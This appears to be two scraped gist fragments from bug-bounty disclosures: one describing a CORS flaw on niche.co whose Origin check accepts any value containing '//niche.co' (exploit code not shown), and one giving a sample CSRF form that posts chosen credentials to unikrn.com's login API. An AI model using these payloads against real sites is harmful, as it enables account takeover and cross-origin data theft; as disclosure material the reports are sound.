This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Payload: Use this payload to send XHR request to the cross domain | |
| Description: | |
| Basically, the application was only checking whether "//niche.co" was in the Origin header, that means i can give anything containing that. For ex : "https://niche.co.evil.net", "https://niche.com", i can even change the protocol like http, ftp, file etc. cors_1.png (F363563): cors_1.png | |
| Steps To Reproduce: | |
| Exploit: | |
| Host this code on a domain(http://niche.co.evil.net) or any other that contains "//niche.co". |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **Sample CSRF Payload** | |
| <html> | |
| <body> | |
| <form action="https://unikrn.com/apiv1/login" method="POST"> | |
| <input type="hidden" name="usr" value="[email]"> | |
| <input type="hidden" name="pwd" value="[password]"> | |
| <input type="submit" value="Submit request" /> | |
| </form> | |
| </body> |